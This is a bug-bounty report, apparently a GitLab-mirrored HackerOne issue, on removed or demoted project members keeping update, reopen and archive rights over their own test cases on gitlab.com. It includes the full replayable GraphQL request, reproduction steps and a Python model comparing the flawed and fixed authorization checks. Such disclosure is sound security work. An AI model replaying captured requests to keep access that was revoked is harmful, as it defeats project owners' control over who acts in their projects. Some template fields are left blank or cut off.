Removed members of a project can reopen, update and close their own test cases on gitlab.com [access control issue]
HackerOne report #2257460 by indoappsec
on 2023-11-20, assigned to @ngeorge1:
Report
Summary:
On gitlab.com, under Project -> Build -> Test cases, users with the Reporter role can create, edit and remove test cases in the project.
https://docs.gitlab.com/ee/user/permissions.html
While the user is a member of the project they have full access to test cases; once removed from the project they should have no access to its test cases at all.
In my testing I found that removed members of a project can still reopen, update and close their own test cases in the project.
This way the user will always be able to interact with the project through test cases.
Ex: at any time this user can reopen the case and update its content to look like a new test case.
Note: the same issue applies to private projects when the user is demoted to the Guest role in the project.
Vulnerable HTTP request:
POST /api/graphql HTTP/2
Host: gitlab.com
Cookie: Cookies
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://gitlab.com/VG-Admin-group-Latest/test-project-1110/-/quality/test_cases/10
Content-Type: application/json
Content-Length: 1271
Origin: https://gitlab.com
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"operationName":"updateTestCase","variables":{"input":{"projectPath":"VG-Admin-group-Latest/test-project-1110","iid":"10","title":"Able to update Test Case ","description":"Able to update Test Case"}},"query":"mutation updateTestCase($input: UpdateIssueInput!) {\n updateIssue(input: $input) {\n clientMutationId\n errors\n issue {\n ...TestCase\n taskCompletionStatus {\n count\n completedCount\n __typename\n }\n __typename\n }\n __typename\n }\n}\n\nfragment TestCase on Issue {\n id\n title\n titleHtml\n description\n descriptionHtml\n state\n type\n createdAt\n updatedAt\n updatedBy {\n ...Author\n __typename\n }\n webUrl\n blocked\n confidential\n moved\n movedTo {\n id\n webUrl\n __typename\n }\n author {\n ...Author\n __typename\n }\n labels {\n nodes {\n ...Label\n __typename\n }\n __typename\n }\n currentUserTodos(first: 1) {\n nodes {\n id\n state\n __typename\n }\n __typename\n }\n __typename\n}\n\nfragment Author on User {\n id\n avatarUrl\n name\n username\n webUrl\n __typename\n}\n\nfragment Label on Label {\n id\n title\n description\n color\n textColor\n __typename\n}\n"}
Steps to reproduce:
You will need two accounts to reproduce this issue: one group Owner account and one member account.
1. Log in from the group Owner account and add a new public project (Ex: test project).
2. Go to Project -> Members and add the test member with the Reporter role.
3. Log in as the test member user and go to the test project.
4. Go to Build -> Test cases and create a new test case (Ex: attacker test case).
5. Capture the HTTP requests for the Edit test case, Archive test case and Reopen test case actions.
6. Each request looks like the GraphQL request shown above; only the parameters differ per action.
7. From the Owner account, remove the test user from the project.
8. From the test user account, check the test cases section: the test user no longer has edit access to the test cases in the UI.
9. Replay the captured request from the test user account.
10. The test user is still able to update, reopen and archive test cases in the project.
Note: to reproduce the issue on a private project, follow the same steps but don't remove the user from the project; only demote the user to Guest and the attack will still work.
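The summary and the steps above both come down to one authorization decision: whether the updateIssue mutation re-checks the actor's current project membership or lets authorship of the test case stand in for it. The following is an added example, not GitLab's code, that models that decision with the flawed rule beside a corrected one and replays the report's three situations (active Reporter, removed author, author demoted to Guest on a private project). Project paths, user names and the error text are constructed for illustration.

```python
# Added example (not GitLab's code): a minimal model of the authorization
# decision behind the updateIssue mutation used for test cases. The flawed
# rule lets the author of a test case keep update/reopen/archive rights after
# being removed from the project or demoted to Guest; the corrected rule
# requires *current* membership at Reporter or above. Project paths, user
# names and the error text below are constructed for illustration.
from dataclasses import dataclass, field
from enum import IntEnum
from typing import Callable, Dict, List, Tuple


class Role(IntEnum):
    """Ordered like GitLab access levels: a higher value means more access."""
    GUEST = 10
    REPORTER = 20
    DEVELOPER = 30
    MAINTAINER = 40
    OWNER = 50


@dataclass
class Project:
    path: str
    public: bool
    # username -> current role; a removed member is simply absent
    members: Dict[str, Role] = field(default_factory=dict)


@dataclass
class TestCase:
    iid: int
    author: str
    state: str = "opened"


Policy = Callable[[str, Project, TestCase], bool]


def has_role(project: Project, user: str, minimum: Role) -> bool:
    """True when the user currently holds at least `minimum` in the project."""
    role = project.members.get(user)
    return role is not None and role >= minimum


def can_update_vulnerable(user: str, project: Project, tc: TestCase) -> bool:
    """Flawed rule: authorship alone is enough, so membership is never
    re-checked for the original author of the test case."""
    return tc.author == user or has_role(project, user, Role.REPORTER)


def can_update_fixed(user: str, project: Project, tc: TestCase) -> bool:
    """Corrected rule: the actor must hold Reporter or higher right now.
    Authorship grants nothing on its own, which covers both the removed
    member and the member demoted to Guest."""
    return has_role(project, user, Role.REPORTER)


def update_test_case(policy: Policy, user: str, project: Project,
                     tc: TestCase, new_state: str) -> Tuple[bool, List[str]]:
    """Simulate the updateIssue mutation; the returned pair mirrors the
    (success, errors) shape of the GraphQL response in the report."""
    if not policy(user, project, tc):
        # Constructed error text, not GitLab's exact wording.
        return False, ["you do not have permission to update this test case"]
    tc.state = new_state
    return True, []


def run_scenarios(policy: Policy) -> Dict[str, bool]:
    """Replay the report's situations against one policy and return which
    actors were allowed to reopen their own archived test case."""
    public_proj = Project("vg-admin-group/test-project", public=True,
                          members={"owner": Role.OWNER, "reporter": Role.REPORTER})
    private_proj = Project("vg-admin-group/private-project", public=False,
                           members={"owner": Role.OWNER, "demoted": Role.GUEST})
    results: Dict[str, bool] = {}

    # Active Reporter editing their own test case: must stay allowed.
    tc = TestCase(iid=10, author="reporter", state="archived")
    results["active_reporter"] = update_test_case(policy, "reporter", public_proj, tc, "opened")[0]

    # Author who was removed from the public project (steps 7-10 above).
    tc = TestCase(iid=11, author="removed", state="archived")
    results["removed_author"] = update_test_case(policy, "removed", public_proj, tc, "opened")[0]

    # Author demoted to Guest on a private project (the note under the steps).
    tc = TestCase(iid=12, author="demoted", state="archived")
    results["demoted_guest_author"] = update_test_case(policy, "demoted", private_proj, tc, "opened")[0]

    # Unrelated non-member: denied by either rule.
    tc = TestCase(iid=13, author="reporter", state="archived")
    results["stranger"] = update_test_case(policy, "stranger", public_proj, tc, "opened")[0]
    return results


if __name__ == "__main__":
    for name, policy in (("vulnerable", can_update_vulnerable), ("fixed", can_update_fixed)):
        print(name, run_scenarios(policy))
```

The point of the comparison is that the fix is not to strip authorship from the policy but to make current membership a hard requirement for the test-case operations that Reporter access gates; the same regression scenarios (removed author, demoted Guest author) are the ones a server-side test for this class of bug should carry.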
What is the current bug behavior?
Removed users shouldn't be able to
What is the expected correct behavior?
Output of checks:
This bug happens on GitLab.com
Impact
Removed members of a project can reopen, update and close their own test cases on gitlab.com [access control issue].
This way the user will always be able to interact with the project through test cases.
Ex: at any time this user can reopen the case and update its content to look like a new test case.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: